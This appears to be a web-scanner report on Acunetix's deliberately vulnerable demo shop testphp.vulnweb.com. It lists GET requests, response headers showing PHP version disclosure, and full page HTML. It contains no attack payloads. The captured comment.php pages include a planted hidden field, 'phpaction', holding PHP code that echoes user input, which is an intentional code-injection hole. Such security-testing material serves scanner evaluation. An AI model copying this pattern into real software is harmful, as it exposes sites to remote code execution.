</div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/cart.php |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 259 bytes. |
GET http://testphp.vulnweb.com/cart.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4903 |
Response Body - size: 4,903 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>you cart</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Error</h2> <div class='story'> <p>You are not logged on. To log on please visit our <a href='login.php'>login page</a></p> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/categories.php |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/categories.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:44 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6115 |
Response Body - size: 6,115 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture categories</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">categories</h2> <div class='story'><a href='listproducts.php?cat=1'><h3>Posters</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div><div class='story'><a href='listproducts.php?cat=2'><h3>Paintings</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div><div class='story'><a href='listproducts.php?cat=3'><h3>Stickers</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div><div class='story'><a href='listproducts.php?cat=4'><h3>Graffity</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/comment.php?aid=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1252 |
Response Body - size: 1,252 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title> comment on artist</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> <br> <table border="0" width="320" height="200"> <tr> <td valign="top" class="story" align="left">Name</td> <td valign="top"><input name="name" type="text" id="name" value="<your name here>" size="25"></td> </tr> <tr> <td valign="top" class="story" align="left">Comment</td> <td valign="top"><textarea name="comment" cols="35" rows="8" wrap="VIRTUAL" id="comment"></textarea></td> </tr> <tr> <td> </td> <td align="left" valign="top"><input type="submit" name="Submit" value="Submit"><input type="hidden" name="phpaction" value="echo $_POST[comment];"></td> </tr> </table> </form> </body> </html> |
URL | http://testphp.vulnweb.com/comment.php?aid=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1252 |
Response Body - size: 1,252 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title> comment on artist</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> <br> <table border="0" width="320" height="200"> <tr> <td valign="top" class="story" align="left">Name</td> <td valign="top"><input name="name" type="text" id="name" value="<your name here>" size="25"></td> </tr> <tr> <td valign="top" class="story" align="left">Comment</td> <td valign="top"><textarea name="comment" cols="35" rows="8" wrap="VIRTUAL" id="comment"></textarea></td> </tr> <tr> <td> </td> <td align="left" valign="top"><input type="submit" name="Submit" value="Submit"><input type="hidden" name="phpaction" value="echo $_POST[comment];"></td> </tr> </table> </form> </body> </html> |
URL | http://testphp.vulnweb.com/comment.php?aid=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1252 |
Response Body - size: 1,252 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title> comment on artist</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> <br> <table border="0" width="320" height="200"> <tr> <td valign="top" class="story" align="left">Name</td> <td valign="top"><input name="name" type="text" id="name" value="<your name here>" size="25"></td> </tr> <tr> <td valign="top" class="story" align="left">Comment</td> <td valign="top"><textarea name="comment" cols="35" rows="8" wrap="VIRTUAL" id="comment"></textarea></td> </tr> <tr> <td> </td> <td align="left" valign="top"><input type="submit" name="Submit" value="Submit"><input type="hidden" name="phpaction" value="echo $_POST[comment];"></td> </tr> </table> </form> </body> </html> |
URL | http://testphp.vulnweb.com/disclaimer.php |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/disclaimer.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5524 |
Response Body - size: 5,524 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>disclaimer</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">Disclaimer</h2> <div class="story"> <h6>Please read carefully</h6> <p>This website is created to demonstrate the abilities of Acunetix new product <strong>WEB Vulnerability Scanner</strong>.</p> It is not intended to be a real online shop. Also this website was constructed with common web programming errors so it is buggy. <p>Please do not post any confidential information on this site. Do not give any creditcard number or real address, nor e-mail or website addresses.</p> <p>Information you post on this site are by no means private nor protected!</p> <p>All images on this site were generated with fre software <a href="http://www.eclectasy.com/Fractal-Explorer/index.html" target="_blank"> <strong>Fractal Explorer</strong></a>.</p> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/guestbook.php |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 264 bytes. |
GET http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5390 |
Response Body - size: 5,390 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>guestbook</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong></strong></td><td align="right" style="background-color:#F5F5F5">12.13.2022, 4:16 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif"> </td></tr></table> </div> <div class="story"> <form action="" method="post" name="faddentry"> <input type="hidden" name="name" value="anonymous user"> <textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea> <br> <input type="submit" name="submit" value="add message"> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/hpp/ |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 255 bytes. |
GET http://testphp.vulnweb.com/hpp/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 203 |
Response Body - size: 203 bytes. |
<title>HTTP Parameter Pollution Example</title>
<a href="?pp=12">check</a><br/> <hr> <a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a> |
